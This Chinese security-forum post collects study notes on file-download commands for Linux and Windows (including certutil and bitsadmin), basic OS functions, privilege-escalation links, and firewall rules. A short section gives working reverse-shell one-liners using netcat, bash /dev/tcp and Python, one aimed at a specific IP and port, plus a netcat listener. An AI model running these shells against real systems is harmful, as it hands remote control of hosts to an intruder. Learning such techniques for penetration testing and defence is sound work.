棱角社区：[~]#棱角 ::Edge.Forum*

专业名词

操作系统

文件下载

linux:下载命令

1. wget命令
wget是一个非常强大的命令行下载工具，支持HTTP、HTTPS、FTP等多种协议，并具备断点续传、递归下载等功能。

基本用法：

下载文件到当前目录：wget [URL]
下载文件并重命名：wget -O 新文件名 [URL]
后台下载文件：wget -b [URL]
断点续传：wget -c [URL]

示例：

下载文件：wget http://example.com/file.zip
下载文件并重命名为newfile.zip：wget -O newfile.zip http://example.com/file.zip
2. curl命令

简介：
curl是另一个功能强大的命令行下载工具，支持多种协议，并可以用于发送HTTP请求和接收服务器响应。与wget相比，curl提供了更多的功能和选项。

基本用法：

下载文件到当前目录：curl -O [URL]
下载文件并重命名：curl -o 新文件名 [URL]
后台下载文件（需要结合其他命令或脚本实现）：curl本身没有直接的后台下载选项，但可以通过将curl命令放入后台运行的shell脚本来实现。
断点续传：curl -C - -O [URL]（注意：curl的断点续传功能可能不如wget直观或强大）

示例：

下载文件：curl -O http://example.com/file.zip
下载文件并重命名为newfile.zip：curl -o newfile.zip http://example.com/file.zip
3. scp命令

简介：
scp（secure copy）是一个用于在本地主机和远程主机之间通过SSH协议安全传输文件的命令。虽然它主要用于文件传输而非直接从Web服务器下载文件，但可以用于从远程Linux服务器下载文件到本地。

基本用法：

从远程主机下载文件到本地：scp 用户名@远程主机地址:/远程文件路径 /本地保存路径

示例：

从远程服务器下载example.tar.gz文件：scp user@example.com:/path/to/example.tar.gz /local/directory/
4. rsync命令

简介：
rsync是一个快速、灵活、高效的文件复制和同步工具，它可以通过本地网络或SSH等方式进行文件传输。与scp类似，rsync也主要用于文件同步和传输，但提供了更多的选项和功能。

基本用法：

从远程主机下载文件或目录到本地：rsync -avz 用户名@远程主机地址:/远程文件或目录路径 /本地保存路径

示例：

从远程服务器下载example目录：rsync -avz user@example.com:/path/to/example/ /local/directory/
5. ftp命令

简介：
ftp（File Transfer Protocol）是一种用于文件传输的协议，ftp命令允许用户通过命令行界面与FTP服务器进行交互，从而上传或下载文件。

基本用法：

使用ftp命令进入交互模式后，通过get命令下载文件。

示例：

进入ftp交互模式（略过具体命令，因为需要用户手动输入服务器地址、用户名和密码等信息）
下载文件：get 文件名

windows系统下载命令：

在Windows系统中，下载文件的命令与所使用的工具紧密相关。以下是几种常用的下载文件的方法及其对应的命令：

1. 使用PowerShell

PowerShell是Windows系统内置的一个功能强大的脚本环境，可以用来执行复杂的任务，包括下载文件。使用PowerShell下载文件的命令通常是：

Invoke-WebRequest -Uri "http://URL/FileName" -OutFile "Save-As-FileName"

这里，"http://URL/FileName" 是你想要下载的文件的URL地址，"Save-As-FileName" 是你希望将文件保存为的名称（包括文件格式后缀）。

2. 使用CertUtil

CertUtil是Windows系统自带的一个命令行工具，主要用于管理证书，但它也支持从网络上下载文件。使用CertUtil下载文件的命令如下：

certutil -urlcache -split -f "http://URL/FileName" "Save-As-FileName"

同样地，"http://URL/FileName" 是文件的URL，"Save-As-FileName" 是保存的文件名。

3. 使用BitsAdmin

BitsAdmin是另一个Windows内置的命令行工具，它用于在后台传输文件，可以在用户注销或计算机关闭时继续传输。使用BitsAdmin下载文件的命令可能比较复杂，因为它需要创建一个下载作业，但基本步骤如下：

bitsadmin /transfer myDownloadJob /download /priority normal "http://URL/FileName" "C:\path\to\Save-As-FileName"

这里，"myDownloadJob" 是你给下载作业起的名字，"http://URL/FileName" 是文件的URL，"C:\path\to\Save-As-FileName" 是文件的保存路径和名称。

4. 使用wget或curl（如果已安装）

尽管wget和curl不是Windows系统内置的，但它们是非常流行的命令行下载工具，可以在Windows上通过安装第三方软件包（如GnuWin32、Cygwin或Windows Subsystem for Linux）来使用。

wget的命令格式类似于：wget http://URL/FileName，然后可以使用-O选项来指定保存的文件名。
curl的命令格式类似于PowerShell中的Invoke-WebRequest，但curl在Windows上可能需要单独安装。
5. 使用Git（针对特定场景）

如果你的目标是下载Git仓库中的文件或特定版本的文件，可以使用Git命令。但请注意，这通常用于版本控制场景，而不是一般的文件下载。Git相关的命令包括git clone（克隆整个仓库）、git checkout（检出特定版本或分支的文件）等。

 

反弹shell

反弹shell在线生成：反弹shell生成器

1. Netcat (nc) 反弹shell

nc支持 -e时

nc -e /bin/bash 47.94.235.118 5566 #nc -e /bin/bash 攻击者IP 端口

nc 不支持 -e时

nc 攻击者IP 端口 | /bin/bash | nc 攻击者IP 另一个端口

2.bash反弹shell

使用/dev/tcp来建立一个TCP连接，并将bash的标准输入、输出和错误输出重定向到这个连接上

bash -i >& /dev/tcp/攻击者IP/端口 0>&1  #启动一个交互式bash，将标准输出和标准错误输出重定向到/dev/tcp/攻击者IP/端口（即建立一个到攻击者IP上指定端口的TCP连接，并将输出发送到那里），然后将标准输入也重定向到那里。

3.Python反弹shell

通过Python的socket库来建立连接，并使用os.dup2来重定向标准输入、输出和错误输出

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击者IP",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

监听

命令 nc -lvvp 5566 是使用 Netcat（nc）工具在本地计算机上监听（listen）TCP端口5566

nc -lvvp 5566   #Netcat 将在你的计算机上监听TCP端口5566，等待连接到该端口的客户端,连接建立后，你就可以开始在该连接上发送和接收数据

知识点

用途

操作系统的用途是管理和控制计算机系统的硬件和软件资源，提供用户与计算机之间的交互界面，以及确保计算机系统的安全、稳定和可靠运行。它是计算机系统中不可或缺的一部分。

1.资源管理

处理器管理：操作系统负责管理和分配计算机的处理器时间，确保多个程序能够公平、高效地运行。它使用各种调度算法来决定哪个程序先执行，哪个程序后执行。
内存管理：操作系统负责内存的分配和回收，以及提供内存保护。它确保每个程序都有自己的内存空间，避免程序间的相互干扰。
设备管理：操作系统管理计算机的输入输出设备，如键盘、鼠标、打印机、硬盘等。它为用户和程序提供统一的设备访问接口，隐藏设备间的差异。
文件管理：操作系统提供对文件的创建、删除、读写、复制、移动等操作，以及文件的目录结构管理。它使得用户能够方便地组织和访问存储在硬盘上的数据。

2.提供用户界面：

操作系统提供图形用户界面（GUI）或命令行界面（CLI），使用户能够方便地与计算机进行交互。GUI通过图形化的方式展示信息，使得操作更加直观和易于理解；CLI则通过命令行的方式，允许用户通过输入命令来执行各种操作。

3.程序执行：

操作系统负责程序的加载和执行。当用户启动一个程序时，操作系统会将其从硬盘加载到内存中，并为其分配必要的资源，然后执行该程序。程序执行完毕后，操作系统会回收其占用的资源。

4.系统安全：

操作系统提供了一系列的安全机制，如用户认证、权限管理、数据加密等，以保护计算机系统和数据的安全。它确保只有经过授权的用户才能访问特定的资源，防止未授权访问和恶意攻击。

5.系统扩展和维护：

操作系统支持硬件和软件的扩展，使得用户能够根据需要添加新的硬件设备或软件应用程序。同时，操作系统还提供了系统维护的功能，如磁盘碎片整理、系统备份和恢复等，以确保计算机系统的稳定性和可靠性。

命令

linux基础命令：Linux命令和介绍_linux ctr-d-****博客

windows基础命令：Windows常用详细命令大全_windows命令大全-****博客

权限

linux权限：【Linux】 Linux用户权限、文件权限、权限操作相关介绍_描述linux操作系统中文件普通权限、设置方法;用户受权限的影响。-****博客

udf提权：udf提权_kali udf提权-****博客

windows:win权限提升（非常详细）零基础入门到精通，收藏这一篇就够了_windows权限提升-****博客

网络

  网络可以大致分为内网（Internal Network 或 Intranet）和外网（External Network 或 Internet）。这两种网络在功能、范围、安全性等方面有着显著的区别。

内网

  内网是指允许企业或组织内部用户访问的网络，通常与互联网物理隔离或通过防火墙等安全设备相连，以确保内部数据的安全性和隐私性。内网主要用于企业内部资源共享、信息交流、协同工作等。内网中的设备（如计算机、服务器、打印机等）和资源（如文件、数据库、应用程序等）通常只对内部用户开放，外部用户无法直接访问。

外网

  外网即互联网，是一个全球性的计算机网络系统，由无数个子网相互连接而成。互联网通过标准的网络协议和通信规则，实现了全球范围内的信息共享和交流。互联网上的资源丰富多彩，包括各种网站、服务、应用程序等，用户可以通过浏览器、电子邮件、即时通讯工具等访问和使用这些资源。

防火墙

  防火墙的出站和入站规则是保护网络安全的重要组成部分。通过合理配置这些规则，可以有效地控制数据的流入和流出，防止敏感信息泄露和恶意攻击的发生。因此，在使用防火墙时，用户应该充分了解并合理配置这些规则，以确保网络的安全性和稳定性。

出站

  出站规则是指防火墙对从内部网络流向外部网络的数据流进行过滤和控制的规则。这些规则通常用于限制内部网络中的计算机向外部网络发送数据的类型和数量，以保护内部网络的安全性。通过出站规则，可以确保只有符合特定条件的数据包才能被允许离开内部网络，从而防止敏感信息泄露或不当的数据传输。

入站

  入站规则则是指防火墙对从外部网络流向内部网络的数据流进行过滤和控制的规则。这些规则用于限制外部网络中的计算机向内部网络发送数据的类型和数量，以防止外部网络的攻击和入侵。通过入站规则，可以确保只有经过授权和验证的数据包才能被允许进入内部网络，从而保护内部网络免受恶意攻击和未授权访问的威胁。